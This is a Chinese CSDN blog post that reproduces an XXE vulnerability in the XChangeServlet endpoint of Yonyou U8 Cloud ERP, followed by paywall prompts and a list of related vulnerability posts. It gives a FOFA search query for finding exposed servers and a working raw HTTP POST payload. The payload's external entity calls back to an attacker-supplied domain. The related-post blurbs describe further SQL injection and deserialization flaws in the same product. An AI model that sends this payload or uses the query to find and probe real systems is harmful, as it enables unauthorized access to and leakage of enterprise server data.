【漏洞复现】用友U8-Cloud XChangeServlet XXE漏洞

最新推荐文章于 2024-08-13 20:55:14 发布

从不学安全

最新推荐文章于 2024-08-13 20:55:14 发布

阅读量569

点赞数 8

分类专栏：漏洞复现文章标签：安全分布式云原生服务器 zookeeper

本文链接：https://blog.csdn.net/qq_67810151/article/details/138698567

版权

漏洞复现专栏收录该内容

99 篇文章 35 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文介绍了用友U8Cloud云ERP中XChangeServlet存在的XXE漏洞，该漏洞可能导致未授权攻击者获取数据库敏感信息，影响服务器数据安全。文章详细阐述了漏洞概述、测绘语句、复现过程及影响范围。

摘要由CSDN通过智能技术生成

0x01 产品简介

用友U8Cloud是用友推出的新一代云ERP，主要聚焦成长型、创新型企业，提供企业级云ERP整体解决方案。

0x02 漏洞概述

用友U8 cloud /service/XChangeServlet接口存在XXE漏洞，未授权的攻击者可通过此漏洞获取数据库敏感信息，从而盗取服务器数据，造成服务器信息泄露。

0x03 测绘语句

fofa: body="开启U8 cloud云端之旅"

0x04 漏洞复现

POST /service/XChangeServlet HTTP/1.1

Host:

Content-Type: text/xml



<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://{
  {domain}}">]><r><a>&xxe;</a ></r>

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

从不学安全

关注关注

8
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

订阅专栏

用友U8 Cloud soapFormat XXE漏洞复现

0xSec

12-27

865

用友U8 Cloud soapFormat.ajax接口处存在 XXE漏洞，攻击者可通过该漏洞获取敏感文件信息，攻击者添加恶意内容，通过易受攻击的代码，就能够攻击包含缺陷的XML处理器。

用友U8 Cloud ReportDetailDataQuery SQL注入漏洞复现(QVD-2023-47860)

0xSec

02-05

841

用友U8 cloud ReportDetailDataQuery接口处存在SQL注入漏洞，攻击者未经授权可以访问数据库中的数据，从而盗取用户数据，造成用户信息泄露。

参与评论您还未登录，请先登录后发表或查看评论

weixin_43167326的博客

04-02

720

U8 cloud 聚焦成长型、创新型企业的云 ERP，基于全新的企业互联网应用设计理念，为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案，全面支持多组织业务协同、智能财务，人力服务、构建产业链智造平台，融合用友云服务实现企业互联网资源连接、共享、协同。该系统存在任何文件读取漏洞。

漏洞复现」用友U8 Cloud BusinessRefAction SQL注入漏洞

最新发布

qq_39894062的博客

08-13

762

【漏洞复现】用友U8 Cloud——XXE

LongL_GuYu的博客

07-13

897

用友U8 Cloud 提供企业级云ERP整体解决方案，全面支持多组织业务协同，实现企业互联网资源连接。其smartweb2.showRPCLoadingTip.d接口处存在XML实体，攻击者可通过该漏洞获取敏感文件信息。

用友U8-Cloud接口FileServlet存在任意文件读取漏洞（含批量验证poc）_用友u8-cloud fileservlet接口存在任意文件读取漏洞

m0_60229361的博客

04-16

734

Python编程学习，学习内容包含：语法、正则、文件、网络、多线程等常用库，推荐《Python核心编程》，不要看完；在实际的渗透测试过程中，面对复杂多变的网络环境，当常用工具不能满足实际需求的时候，往往需要对现有工具进行扩展，或者编写符合我们要求的工具、自动化脚本，这个时候就需要具备一定的编程能力。恭喜你，如果学到这里，你基本可以从事一份网络安全相关的工作，比如渗透测试、Web 渗透、安全服务、安全分析等岗位；③漏洞扫描、漏洞利用、原理，利用方法、工具（MSF）、绕过IDS和反病毒侦察。

用友U8 Cloud XChangeServlet XXE漏洞复现

0xSec

04-30

641

用友U8 Cloud XChangeServlet接口处存在XXE漏洞，攻击者可通过该漏洞获取敏感文件信息，攻击者添加恶意内容，通过易受攻击的代码，就能够攻击包含缺陷的XML处理器。

【漏洞复现】用友-U8C-XXE-smartweb2

知黑而守白

05-15

122

用友UAP平台是一体化平台，其中包括了开发平台、集成平台、动态建模平台、商业分析平台（用友BQ）、数据处理平台（用友AE）、云管理平台和运行平台等7个领域产品，这些平台产品涵盖了软件应用的全生命周期和IT服务管理过程，用于全面支撑平台化企业，可以为大中型企业与公共组织构建信息化平台提供核心工具与服务用友UPA系统 smartweb2 接口存在xxe漏洞，恶意攻击者可能会利用该命令在xml中构造恶意命令，可能会导致服务器失陷或者敏感信息泄露。

用友U8 Cloud smartweb2.showRPCLoadingTip.d XXE漏洞复现

0xSec

06-26

792

用友U8 Cloud smartweb2.showRPCLoadingTip.d 接口处存在XML实体，攻击者可通过该漏洞获取敏感文件信息，攻击者添加恶意内容，通过易受攻击的代码，就能够攻击包含缺陷的XML处理器。

【漏洞复现】用友 GRP-U8 Proxy SQL注入

alert['Hello World']

07-07

364

用友GRP-U8是一款功能全面、灵活度高、可定制性强的ERP软件，能够协助企业实现资源的高效管理，优化企业运营流程，提升整体管理水平。用友 GRP-U8 Proxy 存在SQL注入漏洞，攻击者通过漏洞可以获取服务器数据库权限

U8cloud系统ReportDetailDataQuery接口SQL注入漏洞分析

qq_42067124的博客

12-28

723

U8cloud系统ReportDetailDataQuery接口SQL注入漏洞分析

NC63供外部系统接口调用案例.docx

05-14

NC63提供webservice接口供外部系统调用，从发布到调试

Web Services Testing with soapUI

10-17

Web Services Testing with soapUI

漏洞复现--用友U8-cloud RegisterServlet SQL注入

qq_53003652的博客

11-14

1065

U8 cloud集中于企业内部管理管控，管理规范，高效，协同，透明。通过云模式，低成本，快速部署，即租即用帮助企业免除硬软件投入的快速搭建企业管理架构。通过云服务连接，业务模式、服务模式的经营创新。该产品RegisterServlet处存在SQL注入。访问/servlet/RegisterServlet。如上页面即可能存在漏洞。用友U8-Cloud。

用友u8 注入RCE漏洞利用数据

reaido的博客

07-07

1124

一、漏洞成因用友GRP-u8存在XXE漏洞，该漏洞源于应用程序解析XML输入时没有进制外部实体的加载，导致可加载恶意外部文件。二、用于SQL注入的POC POST /Proxy HTTP/1.1Host: localhost:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.

XXE漏洞

acepanhuan的博客

02-18

573

XXE漏洞

NC接口外部交换平台xml文件导入代码

kon_mio的博客

07-01

2494

public String addOrUpdateBill(String xml){ Logger.error(“输入参数xml:” + xml); String result = null; String url = getUrl(“datasource”);//获取需要的参数 Logger.error(“url:” + url); if (url == null) { Logger.error(“获取url地址错误”); url = “http://117.28.239.226:99/service/X

用友U8 cloud servicedispatcher 反序列化漏洞（含批量验证poc）

weixin_43567873的博客

04-28

1487

用友U8 cloud servicedispatcher 反序列化漏洞（含批量验证poc）

【漏洞复现】用友-U8C-反序列化-ClientRequestDispatch

知黑而守白

04-19

211

用友U8Cloud是用友网络科技股份有限公司（简称“用友网络”）推出的一款云端企业管理软件。用友U8Cloud提供了全面的企业管理功能，包括财务管理、人力资源管理、供应链管理、采购管理、销售管理等。支持多种业务模式，适用于不同行业和企业规模的需求，帮助企业实现数字化转型和云端化管理。用友U8C ClientRequestDispatch接口存在反序列化漏洞，使得攻击者可以通过构造特定的请求远程执行恶意代码。此漏洞可能导致攻击者获取系统权限、执行任意命令，严重威胁系统的机密性和完整性。

用友GRP-U8高校内控管理软件漏洞

07-28

- *2* *3* [用友 GRP-U8 Proxy XXE-SQL注入漏洞](https://blog.csdn.net/weixin_46944519/article/details/127225867)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip...